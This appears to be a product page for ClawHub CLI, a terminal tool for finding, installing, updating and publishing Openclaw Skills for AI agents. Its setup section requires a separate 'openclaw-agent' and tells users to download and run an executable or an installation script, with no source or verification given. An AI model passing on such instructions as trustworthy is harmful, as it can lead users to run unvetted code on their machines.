What is ClawHub CLI?

The ClawHub CLI serves as the primary gateway for developers to interact with the expansive ecosystem of Openclaw Skills. It allows users to search the official registry, manage versioned installations, and keep their agent capabilities up to date with simple terminal commands. By acting as a bridge between the local development environment and the central registry, it ensures that your AI agents always have access to the most efficient and secure skill sets available.

Beyond simple management, the CLI is a critical tool for creators. It provides the necessary infrastructure to authenticate, package, and publish custom-built Openclaw Skills to the global community. Whether you are orchestrating complex multi-agent workflows or simply looking to expand your agent's utility, this CLI provides the robust foundation needed for professional agent development.

ClawHub CLI Use Cases

  • Rapidly searching the global registry to find Openclaw Skills for specific tasks like data processing or backups.
  • Automating the installation and setup of agent skills in a new development environment or CI/CD pipeline.
  • Maintaining project stability by pinning Openclaw Skills to specific versions while allowing for easy upgrades.
  • Synchronizing an entire directory of skills to their latest verified versions using bulk update commands.
  • Sharing custom-developed logic with the community by publishing new Openclaw Skills directly from the terminal.

How ClawHub CLI Works

  1. The user ensures the openclaw-agent utility is active, which is a prerequisite for all communication with the registry.
  2. Commands are issued through the terminal to search for or list available Openclaw Skills.
  3. Upon installation, the CLI fetches the requested package and places it into a designated local directory, typically ./skills.
  4. For updates, the CLI performs a hash-based comparison of local files against the registry to determine if a newer version or specific matching hash is available.
  5. When publishing, the CLI validates the local skill folder and uploads it to the registry using the user's authenticated session.

ClawHub CLI Setup

First, ensure you have Node.js installed, then install the CLI globally:

npm i -g clawhub

Requirement: The openclaw-agent must be running.

  • Windows Users: Download the openclaw-agent executable, extract it, and run it before using the CLI.
  • macOS Users: Run the official installation script via Terminal to set up the background agent.

Verify your setup by checking your identity or listing installed Openclaw Skills:

clawhub whoami
clawhub list
